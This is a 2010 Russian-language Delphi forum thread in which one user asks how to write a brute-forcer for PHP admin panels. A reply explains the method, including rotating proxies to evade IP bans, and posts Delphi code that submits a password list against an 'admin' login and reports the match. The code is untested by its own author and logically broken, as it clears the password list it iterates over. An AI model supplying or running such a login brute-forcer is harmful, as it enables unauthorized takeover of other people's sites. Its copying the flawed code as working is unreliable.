Суббота, 05.10.2024, 08:31 Приветствую вас Гость | Группа "Гости" 
[ Новые сообщения · Участники · Правила форума · Поиск · RSS ]
  • Страница 1 из 1
  • 1
Модератор форума: xXxSh@dowxXx, Anton93, Волк-1024  
Брутфорс
EseninДата: Вторник, 27.04.2010, 18:48 | Сообщение # 1
Был не раз
Зарегистрирован: 06.04.2010
Группа: Пользователи
Сообщений: 11
Статус: Offline
Столкнулся с тем что брутфорса рабочего и без троянов для ПХП админки нет, может у кого нить есть сорцы, если нет , то может какие нибудь соображения какие компоненты использовать, хочется иметь самописный брутфорс для админок, НО опыта не хватает.

Сообщение отредактировал Esenin - Вторник, 27.04.2010, 18:49
 
JawДата: Вторник, 27.04.2010, 18:55 | Сообщение # 2
Участник
Зарегистрирован: 09.03.2009
Группа: Пользователи
Сообщений: 70
Статус: Offline
Ну а что там собственно: для каждой админки "индивидуальный код" нужен, но алгоритм у всех одинаковый: посылаем пост/гет(нужный подчеркнуть) запросы на сайт с одним логином например по списку паролей(или на один пароль по списку логинов) парсим результат и все, это все конечно желательно зделать в потоках, и если есть бан по ип прикрутить прокси(кк то так получается).
 
EseninДата: Среда, 28.04.2010, 14:57 | Сообщение # 3
Был не раз
Зарегистрирован: 06.04.2010
Группа: Пользователи
Сообщений: 11
Статус: Offline
В основном все админки POST запрос отправки используют, интересует на один логин подбирать много много паролей, прокси нафиг не надо, а парсить это всмысле обрататывать ответы сервера чтобы понять когда подберется правильный пароль? Раз все так просто есть исходник?? , или какой компонент использовать ...=) я как и большенство здесь в программировании мало понимаю, но очень хочу научится.
 
EseninДата: Среда, 28.04.2010, 15:18 | Сообщение # 4
Был не раз
Зарегистрирован: 06.04.2010
Группа: Пользователи
Сообщений: 11
Статус: Offline
Как отправить один запрос этого в инете полно, авторизация тож кодов хватает, а вот вот перебор паролей чет не нашел, тем не менее если есть у кого нить время чтоб описывать код с самого начала...
 
JawДата: Среда, 28.04.2010, 15:59 | Сообщение # 5
Участник
Зарегистрирован: 09.03.2009
Группа: Пользователи
Сообщений: 70
Статус: Offline
Перебор паролей делается примерно так:

var
data:tstringlist;//в стринг лист предварительно загрузить список паролей
i: integer;//счетчик
result:string;//ответ от сервера
begin
for i:=0 to data.count-1 do//цикл с счетчиком
begin
data.clear;//очищаем стринглист
Data.Add('user=admin');//добаляем параметры
Data.Add('pass='+data.Strings[i]);//перебераем пароли
result:=IdHttp1.Post('http://www.my-site.com/admin',data);// делаем запрос
if Pos('Вы успешно вошли',result)>0 then// если в ответе есть нужная нам фраза значит пароь у нас
MessageBox(0, pchar('Пароль подобран вот он: '+data.Strings[i]), 'ура!!!', MB_ICONINFORMATION)//выводим подобраный пароль
else
sleep(5);//если незалогинились спим
end;
MessageBox(0, 'пароль не был подобран ', 'Ошибка!', MB_ICONWARNING);//сообщение в случае неудачи подбора
end;

Нетестил на работоспособность но должно работать, правда тормизить будет нужно в поток запихнуть.

Сообщение отредактировал Jaw - Среда, 28.04.2010, 22:51
 
  • Страница 1 из 1
  • 1
Поиск:

delphicode.ru © 2008 - 2024 Хостинг от uCoz